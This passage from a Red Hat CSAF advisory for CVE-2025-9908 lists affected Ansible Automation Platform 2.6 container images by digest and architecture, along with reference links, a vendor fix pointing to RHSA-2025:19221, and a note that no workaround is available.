"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9908"
},
{
"category": "external",
"summary": "RHBZ#2392835",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392835"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9908",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9908"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9908",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9908"
}
],
"release_date": "2025-09-17T23:59:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-28T21:16:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrading",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19221"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
